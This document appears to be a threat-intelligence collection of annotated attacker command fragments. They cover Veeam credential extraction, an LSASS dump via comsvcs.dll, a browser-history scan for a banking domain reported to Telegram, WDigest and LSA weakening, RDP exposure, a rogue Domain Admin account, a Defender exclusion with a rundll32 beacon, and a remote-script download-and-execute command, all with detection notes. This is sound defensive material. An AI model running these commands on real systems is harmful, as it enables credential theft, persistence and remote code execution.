| # Ensure script runs with elevated privileges on the Veeam server. | |
| # Step 1: Detect Veeam SQL instance and database from registry or prompt if needed. | |
| $SQLServer = $null | |
| $SQLInstance = $null | |
| $SQLDBName = $null | |
| Add-Type -AssemblyName System.Security | |
| # Check new registry path (for VBR v12+ configurations) | |
| $baseRegPath = "HKLM:\SOFTWARE\Veeam\Veeam Backup and Replication" | |
| if (Test-Path "$baseRegPath\DatabaseConfigurations") { |
| ## Comments marked ## are inserted English translations of the Russian strings | |
| Write-Host "Пробуем создать дамп: $dumpFile` ## Trying to create dump: $dumpFile | |
| # Метод 1: Через Start-Process` ## Method 1: Via Start-Process | |
| Start-Process -FilePath "rundll32.exe" -ArgumentList "C:\Windows\System32\comsvcs.dll, MiniDump 832 $dumpFile full" -Wait -NoNewWindow` | |
| # Проверяем результат` ## Checking the result | |
| if (Test-Path $dumpFile) {` | |
| $file = Get-Item $dumpFile` |
| # =============================================== | |
| # Scan Chrome + Edge history files (ALL users, ALL profiles) | |
| # Search for "secure.chase.com" directly in History DB (no SQLite module) | |
| # Save matches to C:\H\History.txt | |
| # Save PC Name + User + count to C:\H\results.txt | |
| # If count > 10 send results.txt content to Telegram | |
| # Designed for running as service user (SYSTEM) via SimpleHelp | |
| # =============================================== | |
| try { |
| :: NOTE(review): SystemComponent=1 on an Uninstall key is the documented way to keep the "nvspbind" entry out of Programs and Features -- confirm that is the intent here. | |
| reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\nvspbind" /v SystemComponent /t REG_DWORD /d 1 /f | |
| :: NOTE(review): RunAsPPL governs LSA protected-process mode and UseLogonCredential governs WDigest plaintext credential caching; the values written below (0 and 1) weaken both, so any change to these two values should be treated as a high-priority alert. | |
| reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f | |
| reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f |
| :: NOTE(review): SystemComponent=1 on an Uninstall key is the documented way to keep the "nvspbind" entry out of Programs and Features -- confirm that is the intent here. | |
| reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\nvspbind" /v SystemComponent /t REG_DWORD /d 1 /f | |
| :: Opens inbound TCP/3389 in the host firewall (rule named "rdp") and enables the built-in WMI rule group. | |
| netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow | |
| netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes | |
| :: fDenyTSConnections=0 enables Remote Desktop; together with the firewall rule above this exposes RDP on the host, which is worth alerting on for a machine that did not previously serve RDP. | |
| reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f |
| powershell -command \"iex ((New-Object System.Net.WebClient).DownloadString('https://transfer[.]sh/GElU1LmvbS/injcet.ps1'))\" | |
| # Check for Administrator rights | |
| if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) { | |
| Write-Host 'Please Run as Administrator!' -ForegroundColor Red | |
| Exit | |
| } | |
| # Check and return current user name | |
| $currentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[1] | |
| # Paths |
| # Excerpt from Application.evtx EventID 0 | |
| EventData: | |
| Data: | |
| - "Transferred files with action 'Transfer':\r\nRunSchedulerTask.ps1\r\nRunSchedulerTaskOnce.ps1\r\n\r\nVersion: 22.10.11109.8417\r\nExecutable Path: C:\\Program Files (x86)\\ScreenConnect Client (9dd8b1107d6a42d9)\\ScreenConnect.ClientService.exe\r\n" | |
| Channel: Application | |
| EventID: 0 | |
| EventID_attributes: | |
| SystemTime: "2024-02-23T04:06:06Z" |
| :: Creates a domain account named "default" with the password shown in clear text, then adds it to five privileged or remote-access groups; account-creation and group-membership-change events for this name are the artifacts to look for. | |
| net user /add default test@2021! /domain | |
| net group \"Domain Admins\" default /add /domain | |
| net group \"Enterprise Admins\" default /add /domain | |
| net group \"Remote Desktop Users\" default /add /domain | |
| net group \"Group Policy Creator Owners\" default /add /domain | |
| net group \"Schema Admins\" default /add /domain | |
| :: Makes sure the account is enabled (/active:yes). | |
| net user default /active:yes /domain | |
| :: The "default1" creation is issued twice (the second line is redundant); in this excerpt "default1" is never added to any group. | |
| net user /add default1 test@2021! /domain | |
| net user /add default1 test@2021! /domain |
| # Downloaded from hxxp[://]minish[.]wiki[.]gd/c[.]pdf | |
| # Exclude directory in Defender: C:\programdata is added to Defender's exclusion paths, so anything dropped there is no longer scanned. Add-MpPreference exclusion changes are a useful detection point. | |
| powershell.exe Add-MpPreference -ExclusionPath C:\\programdata -Force | |
| # Deploy beacon: rundll32 loads update.dat from the just-excluded directory and calls its UpdateSystem export (the .dat extension hides that this is a loadable library). | |
| rundll32.exe c:\\programdata\\update.dat UpdateSystem |
| $listi = 'hxxps[://]transfer[.]sh/UFQTwgYszH/config14[.]json', | |
| \'hxxps[://]transfer[.]sh/ATVMNG5Pbu/config13[.]json', | |
| \'hxxps[://]transfer[.]sh/s27p8BcTxi/config12[.]json', | |
| \'hxxps[://]transfer[.]sh/ojw6aKoA4A/config11[.]json', | |
| \'hxxps[://]transfer[.]sh/lyEkHLGt03/config10[.]json', | |
| \'hxxps[://]transfer[.]sh/8l4d5qR39o/config9[.]json', | |
| \'hxxps[://]transfer[.]sh/xkIMWnocQH/config8[.]json', | |
| \'hxxps[://]transfer[.]sh/Db5eUfqKP9/config7[.]json', | |
| \'hxxps[://]transfer[.]sh/L1e30KShXP/config6[.]json', | |
| \'hxxps[://]transfer[.]sh/w2Y0iuEKiY/config5[.]json', |